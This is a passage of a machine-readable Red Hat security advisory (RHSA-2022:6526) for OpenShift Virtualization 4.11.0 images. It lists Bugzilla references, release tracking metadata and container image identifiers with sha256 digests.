category: "external", summary: "2093715", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2093715", }, { category: "external", summary: "2093716", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2093716", }, { category: "external", summary: "2093772", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2093772", }, { category: "external", summary: "2093773", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2093773", }, { category: "external", summary: "2093866", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2093866", }, { category: "external", summary: "2093867", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2093867", }, { category: "external", summary: "2094202", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094202", }, { category: "external", summary: "2094207", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094207", }, { category: "external", summary: "2094208", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094208", }, { category: "external", summary: "2094217", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094217", }, { category: "external", summary: "2094222", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094222", }, { category: "external", summary: "2094323", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094323", }, { category: "external", summary: "2094405", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094405", }, { category: "external", summary: "2094440", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094440", }, { category: "external", summary: "2094451", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094451", }, { category: "external", summary: "2094453", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094453", }, { category: "external", summary: "2094465", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094465", }, { category: "external", summary: "2094471", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094471", }, { category: "external", summary: "2094481", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094481", }, { category: "external", summary: "2094486", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094486", }, { category: "external", summary: "2094491", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094491", }, { category: "external", summary: "2094495", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094495", }, { category: "external", summary: "2094646", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094646", }, { category: "external", summary: "2094665", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094665", }, { category: "external", summary: "2094678", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094678", }, { category: "external", summary: "2094727", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094727", }, { category: "external", summary: "2094807", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094807", }, { category: "external", summary: "2094813", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094813", }, { category: "external", summary: "2094848", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094848", }, { category: "external", summary: "2095125", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2095125", }, { category: "external", summary: "2095129", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2095129", }, { category: "external", summary: "2095224", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2095224", }, { category: "external", summary: "2095529", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2095529", }, { category: "external", summary: "2095530", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2095530", }, { category: "external", summary: "2095532", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2095532", }, { category: "external", summary: "2095537", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2095537", }, { category: "external", summary: "2095570", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2095570", }, { category: "external", summary: "2095573", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2095573", }, { category: "external", summary: "2095953", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2095953", }, { category: "external", summary: "2095955", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2095955", }, { category: "external", summary: "2096166", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096166", }, { category: "external", summary: "2096206", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096206", }, { category: "external", summary: "2096208", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096208", }, { category: "external", summary: "2096263", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096263", }, { category: "external", summary: "2096333", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096333", }, { category: "external", summary: "2096492", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096492", }, { category: "external", summary: "2096502", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096502", }, { category: "external", summary: "2096510", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096510", }, { category: "external", summary: "2096511", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096511", }, { category: "external", summary: "2096620", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096620", }, { category: "external", summary: "2096781", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096781", }, { category: "external", summary: "2096801", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096801", }, { category: "external", summary: "2096845", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096845", }, { category: "external", summary: "2097328", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2097328", }, { category: "external", summary: "2097370", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2097370", }, { category: "external", summary: "2097465", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2097465", }, { category: "external", summary: "2097586", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2097586", }, { category: "external", summary: "2098134", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2098134", }, { category: "external", summary: "2098135", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2098135", }, { category: "external", summary: "2098282", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2098282", }, { category: "external", summary: "2099443", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2099443", }, { category: "external", summary: "2099533", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2099533", }, { category: "external", summary: "2099535", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2099535", }, { category: "external", summary: "2099539", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2099539", }, { category: "external", summary: "2099566", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2099566", }, { category: "external", summary: "2099608", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2099608", }, { category: "external", summary: "2099633", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2099633", }, { category: "external", summary: "2099639", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2099639", }, { category: "external", summary: "2099802", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2099802", }, { category: "external", summary: "2100054", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100054", }, { category: "external", summary: "2100284", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100284", }, { category: "external", summary: "2100415", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100415", }, { category: "external", summary: "2100495", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100495", }, { category: "external", summary: "2101164", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101164", }, { category: "external", summary: "2101192", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101192", }, { category: "external", summary: "2101430", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101430", }, { category: "external", summary: "2101454", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101454", }, { category: "external", summary: "2101485", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101485", }, { category: "external", summary: "2101628", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101628", }, { category: "external", summary: "2101954", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101954", }, { category: "external", summary: "2102076", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102076", }, { category: "external", summary: "2102116", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102116", }, { category: "external", summary: "2102117", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102117", }, { category: "external", summary: "2102122", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102122", }, { category: "external", summary: "2102124", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102124", }, { category: "external", summary: "2102125", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102125", }, { category: "external", summary: "2102127", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102127", }, { category: "external", summary: "2102129", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102129", }, { category: "external", summary: "2102131", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102131", }, { category: "external", summary: "2102135", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102135", }, { category: "external", summary: "2102143", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102143", }, { category: "external", summary: "2102256", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102256", }, { category: "external", summary: "2102448", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102448", }, { category: "external", summary: "2102543", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102543", }, { category: "external", summary: "2102544", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102544", }, { category: "external", summary: "2102545", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102545", }, { category: "external", summary: "2104617", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2104617", }, { category: "external", summary: "2106175", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2106175", }, { category: "external", summary: "2106258", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2106258", }, { category: "external", summary: "2110178", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2110178", }, { category: "external", summary: "2111359", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2111359", }, { category: "external", summary: "2111562", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2111562", }, { category: "external", summary: "2117872", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2117872", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2022/rhsa-2022_6526.json", }, ], title: "Red Hat Security Advisory: OpenShift Virtualization 4.11.0 Images security and bug fix update", tracking: { current_release_date: "2025-01-06T19:21:19+00:00", generator: { date: "2025-01-06T19:21:19+00:00", engine: { name: "Red Hat SDEngine", version: "4.2.5", }, }, id: "RHSA-2022:6526", initial_release_date: "2022-09-14T19:28:51+00:00", revision_history: [ { date: "2022-09-14T19:28:51+00:00", number: "1", summary: "Initial version", }, { date: "2022-09-14T19:28:51+00:00", number: "2", summary: "Last updated version", }, { date: "2025-01-06T19:21:19+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "CNV 4.11 for RHEL 8", product: { name: "CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11", product_identification_helper: { cpe: "cpe:/a:redhat:container_native_virtualization:4.11::el8", }, }, }, ], category: "product_family", name: "OpenShift Virtualization", }, { branches: [ { category: "product_version", name: "container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", product: { name: "container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", product_id: "container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", product_identification_helper: { purl: "pkg:oci/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/bridge-marker&tag=v4.11.0-26", }, }, }, { category: "product_version", name: "container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", product: { name: "container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", product_id: "container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", product_identification_helper: { purl: "pkg:oci/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/checkup-framework&tag=v4.11.0-67", }, }, }, { category: "product_version", name: "container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", product: { name: "container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", product_id: "container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", product_identification_helper: { purl: "pkg:oci/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/cluster-network-addons-operator&tag=v4.11.0-26", }, }, }, { category: "product_version", name: "container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", product: { name: "container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", product_id: "container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", product_identification_helper: { purl: "pkg:oci/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/cnv-containernetworking-plugins&tag=v4.11.0-26", }, }, }, { category: "product_version", name: "container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", product: { name: "container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", product_id: "container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", product_identification_helper: { purl: "pkg:oci/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/cnv-must-gather-rhel8&tag=v4.11.0-63", }, }, }, { category: "product_version", name: "container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", product: { name: "container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", product_id: "container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", product_identification_helper: { purl: "pkg:oci/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hco-bundle-registry&tag=v4.11.0-601", }, }, }, { category: "product_version", name: "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", product: { name: "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", product_id: "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", product_identification_helper: { purl: "pkg:oci/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hostpath-csi-driver-rhel8&tag=v4.11.0-21", }, }, }, { category: "product_version", name: "container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", product: { name: "container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", product_id: "container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", product_identification_helper: { purl: "pkg:oci/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hostpath-csi-driver&tag=v4.11.0-21", }, }, }, { category: "product_version", name: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", product: { name: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", product_id: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", product_identification_helper: { purl: "pkg:oci/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8&tag=v4.11.0-21", }, }, }, { category: "product_version", name: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", product: { name: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", product_id: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", product_identification_helper: { purl: "pkg:oci/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8-operator&tag=v4.11.0-24", }, }, }, { category: "product_version", name: "container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", product: { name: "container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", product_id: "container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", product_identification_helper: { purl: "pkg:oci/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-operator&tag=v4.11.0-96", }, }, }, { category: "product_version", name: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", product: { name: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", product_id: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", product_identification_helper: { purl: "pkg:oci/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-webhook-rhel8&tag=v4.11.0-96", }, }, }, { category: "product_version", name: "container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", product: { name: "container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", product_id: "container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", product_identification_helper: { purl: "pkg:oci/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubemacpool&tag=v4.11.0-26", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", product: { name: "container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", product_id: "container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-console-plugin&tag=v4.11.0-83", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", product: { name: "container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", product_id: "container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-ssp-operator&tag=v4.11.0-54", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm&tag=v4.11.0-7", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-copy-template&tag=v4.11.0-7", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-create-datavolume&tag=v4.11.0-7", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template&tag=v4.11.0-7", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize&tag=v4.11.0-7", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep&tag=v4.11.0-7", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template&tag=v4.11.0-7", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-operator&tag=v4.11.0-29", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status&tag=v4.11.0-7", }, }, }, { category: "product_version", name: 